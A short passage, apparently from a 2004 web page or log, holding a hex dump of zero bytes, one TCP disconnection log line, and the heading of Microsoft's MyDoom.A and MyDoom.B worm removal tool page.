0740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0830 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0840 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0850 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0860 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0870 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0880 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0890 00 00 00 00 00 00 00 00 00 00 00 00 00 .............


68.234.4.113 : 3593 TCP Disconnected ID = 5
--- 12/02/2004 16:12:09.774
Status Code: 25088 [25088] (no description available)
 

MyDoom.A and MyDoom.B worm Removal Tool from Microsoft

 

Page last updated on February 12, 2004